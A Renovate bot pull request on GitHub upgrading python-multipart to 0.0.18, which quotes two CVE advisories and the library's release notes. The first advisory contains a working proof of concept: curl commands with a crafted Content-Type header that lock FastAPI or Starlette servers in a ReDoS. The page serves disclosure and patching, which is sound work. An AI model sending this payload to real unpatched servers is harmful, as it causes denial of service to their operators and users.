Skip to content

chore(deps): update dependency python-multipart to v0.0.18 [security] #13

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
renovate wants to merge 1 commit into
base: main
Choose a base branch
from
Open

chore(deps): update dependency python-multipart to v0.0.18 [security] #13

renovate wants to merge 1 commit into from

Conversation

@renovate
Copy link

@renovate renovate bot commented Aug 12, 2024
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
python-multipart (changelog) ==0.0.6==0.0.18 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-24762

Summary

When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options.

An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.

This can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

This only applies when the app uses form data, parsed with python-multipart.

Details

A regular HTTP Content-Type header could look like:

Content-Type: text/html; charset=utf-8

python-multipart parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74

A custom option could be made and sent to the server to break it with:

Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

PoC

Create a simple WSGI application, that just parses the Content-Type, and run it with python main.py:

# main.py
from wsgiref.simple_server import make_server
from wsgiref.validate import validator

from multipart.multipart import parse_options_header

def simple_app(environ, start_response):
    _, _ = parse_options_header(environ["CONTENT_TYPE"])

    start_response("200 OK", [("Content-type", "text/plain")])
    return [b"Ok"]

httpd = make_server("", 8123, validator(simple_app))
print("Serving on port 8123...")
httpd.serve_forever()

Then send the attacking request with:

$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'

Impact

This is a ReDoS, (Regular expression Denial of Service), so it only applies to those using python-multipart to read form data, such as Starlette and FastAPI.

Original Report

This was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r

Original report to FastAPI

Hey Tiangolo!

My name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @​nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).

Here are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:

from typing import Annotated
from fastapi.responses import HTMLResponse
from fastapi import FastAPI,Form
from pydantic import BaseModel

class Item(BaseModel):
    username: str

app = FastAPI()

@​app.get("/", response_class=HTMLResponse)
async def index():
    return HTMLResponse("Test", status_code=200)

@​app.post("/submit/")
async def submit(username: Annotated[str, Form()]):
    return {"username": username}

@​app.post("/submit_json/")
async def submit_json(item: Item):
    return {"username": item.username}

I'm running the above with uvicorn with the following command:

uvicorn server:app

Then run the following cUrl command:

curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'

You'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%

You can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.

If you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.

Cheers

Impact

An attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.

Occurrences

params.py L586

CVE-2024-53981

Summary

When parsing form data, python-multipart skips line breaks (CR \r or LF \n) in front of the first boundary and any tailing bytes after the last boundary. This happens one byte at a time and emits a log event each time, which may cause excessive logging for certain inputs.

An attacker could abuse this by sending a malicious request with lots of data before the first or after the last boundary, causing high CPU load and stalling the processing thread for a significant amount of time. In case of ASGI application, this could stall the event loop and prevent other requests from being processed, resulting in a denial of service (DoS).

Impact

Applications that use python-multipart to parse form data (or use frameworks that do so) are affected.

Original Report

This security issue was reported by:

  • GitHub security advisory in Starlette on October 30 by @​Startr4ck
  • Email to python-multipart maintainer on October 3 by @​mnqazi

Release Notes

Kludex/python-multipart (python-multipart)

v0.0.18

Compare Source

  • Hard break if found data after last boundary on MultipartParser #​189.

v0.0.17

Compare Source

  • Handle PermissionError in fallback code for old import name #​182.

v0.0.16

Compare Source

  • Add dunder attributes to multipart package #​177.

v0.0.15

Compare Source

  • Replace FutureWarning to PendingDeprecationWarning #​174.
  • Add missing files to SDist #​171.

v0.0.14

Compare Source

  • Fix import scheme for multipart module (#​168).

v0.0.13

Compare Source

  • Rename import to python_multipart #​166.

v0.0.12

Compare Source

  • Improve error message when boundary character does not match #​124.
  • Add mypy strict typing #​140.
  • Enforce 100% coverage #​159.

v0.0.11

Compare Source

  • Improve performance, especially in data with many CR-LF #​137.
  • Handle invalid CRLF in header name #​141.

v0.0.10

Compare Source

  • Support on_header_begin #​103.
  • Improve type hints on FormParser #​104.
  • Fix OnFileCallback type #​106.
  • Improve type hints #​110.
  • Improve type hints on File #​111.
  • Add type hint to helper functions #​112.
  • Minor fix for Field.repr #​114.
  • Fix use of chunk_size parameter #​136.
  • Allow digits and valid token chars in headers #​134.
  • Fix headers being carried between parts #​135.

v0.0.9

Compare Source

  • Add support for Python 3.12 #​85.
  • Drop support for Python 3.7 #​95.
  • Add MultipartState(IntEnum) #​96.
  • Add QuerystringState #​97.
  • Add TypedDict callbacks #​98.
  • Add config TypedDicts #​99.

v0.0.8

Compare Source

  • Check if Message.get_params return 3-tuple instead of str on parse_options_header #​79.
  • Cleanup unused regex patterns #​82.

v0.0.7

Compare Source

  • Refactor header option parser to use the standard library instead of a custom RegEx #​75.

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/pypi-python-multipart-vulnerability branch from 622c2a4 to 31220d6 Compare December 4, 2024 05:50
@renovate renovate bot changed the title chore(deps): update dependency python-multipart to v0.0.7 [security] chore(deps): update dependency python-multipart to v0.0.18 [security] Dec 4, 2024
@renovate renovate bot force-pushed the renovate/pypi-python-multipart-vulnerability branch from 31220d6 to 6c78b44 Compare July 27, 2025 12:03
@renovate renovate bot force-pushed the renovate/pypi-python-multipart-vulnerability branch from 6c78b44 to 920e018 Compare August 22, 2025 04:12
@renovate renovate bot force-pushed the renovate/pypi-python-multipart-vulnerability branch from 920e018 to dc91891 Compare August 27, 2025 00:15
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant